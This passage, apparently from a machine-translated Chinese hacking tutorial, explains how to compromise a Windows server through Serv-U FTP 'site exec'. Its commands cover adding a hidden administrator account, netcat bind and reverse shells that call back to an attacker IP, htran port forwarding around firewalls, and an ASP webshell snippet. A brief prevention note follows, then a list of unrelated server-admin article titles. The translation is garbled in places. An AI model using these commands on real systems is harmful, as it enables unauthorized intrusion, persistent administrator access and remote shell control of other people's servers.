quote site exec net user iisuser password /add Add a user named iisuser password as password, add to the administrator group quota site exec net localgroup administrators iisuser /add, now you can connect Pick up the terminal and log in. Of course, you can also perform other operations, such as uploading an nc.exe, and getting a shell with administrator privileges on the target machine, either forward or reverse. Forward connection: Connect to ftp and executequote site exec nc.exe -l -p 23 -t -e cmd.exe At this point, the target host becomes a telnet server, you can telnet the target server 23 Port. Reverse connection: Suppose your IP is 202.96.209.168 1. Run it on your own machine (you must have an external IP): nc -vv -lp 99 2. Run nc -e cmd on the target machine. Exe 202.96.209.168 99 On your machine you will get a shell with administrator privileges on the target machine. If the other party has port filtering or set firewall protection (this protection does not limit the bounce connection, if it is restricted, it will be changed) Other methods) can be implemented using TCP SOCKET forwarding. For example: My machine is A; the machine I want to test is B [Do not allow front connection]; I have already got a SHELL on B [as long as the guest is on it]? We can connect to each other's 43958: I: I am listening to two ports 23 and 56 23 locally, waiting for B to connect; 56 is waiting for me to connect; II: B connecting 23 I am listening, and forwarding to local The 43958 will be built like this. The firewall of the other party will take us no way? At this point, run Serv-U locally to create a new SERVER, IP fill in the local 127.0.0.1 port for 56 users localAdministrator, password #l@$ak#.lk; 0@P. concrete implementation method
Suppose your IP is 202.96.209.168 1. Run htran.exe -listen 23 56 on your own machine; 2. Run Serv-U locally to create a new SERVER, IP fill The local 127.0.0.1 port is 56, the username LocalAdministrator, password #l@$ak#.lk;0@P; Run htran.exe on the target machine -slave 127.0.0.1 43958 202.96.209.168 23 If you can't run directly under webshell, you can write an asp script to execute, as follows:connect.asp<%Set oScript = Server. CreateObject("WSCRIPT.SHELL")oScript.Run (server.mappath("htran")&" -slave 127.0.0.1 43958 202.96.209.168 23 ")%>Execute http://destination URL/connect.asp, If it comes out blank, no error is indicated, now you should be able to manage the Serv-U of the target server, and the rest will depend on your free play. Htran.exe is a multi-threaded package forwarding tool that can be downloaded to Red Alliance Preventing Method
to patch Serv-U and change the default port and management password. Modify the two files ServUAdmin.exe and ServUDaemon.exe. Change the port as long as you add LocalSetupPortNo=12345 in the ServUDaemon.ini file [GLOBAL] option. Unfortunately, the latest version of Serv-U Serv-U 5.2.0.0 is still available. No changes, the default management port and password are still the original.
For anyone in any field, it is the first to start with a novice, and constantly improve their skills
server perfect settings, support asp php cgi jsp asp.net mysql! First download the program we want
Now Windows 2000 system technology is more and more mature, the corresponding Server Pack has also b
What is a cluster? A cluster is a group of independent computer systems that fo
Apache load balancing settings: mod
Tell you seven tips for maintaining your server security
IIS6 has an application error example
What is the difference between the IMAP protocol and the POP protocol?
JSP and IIS the best solution for Case Analysis
Experience the four practical web interfaces in the Win 2003 system
Explain IIS website server performance optimization cheats thirteen articles
Three minutes to ensure the security of IIS itself
Tomcat port number conflict needs to be changed How to modify Tomcat port number
Web server purchase considerations
Apache restart on Centos, mysql restart, nginx restart method
Linux server cluster system implementation solution detailed analysis
Where can I download lossless music? Free download of lossless music method
Teach you how to connect to the network
Prompt for missing driver solutions during Win10 installation
Let Windows 7 x64 IIS7 support 32-bit applications
Incremental backup of websites using rsync (from linux to windows)
The disappearance of the restore point is how to fix the dual system?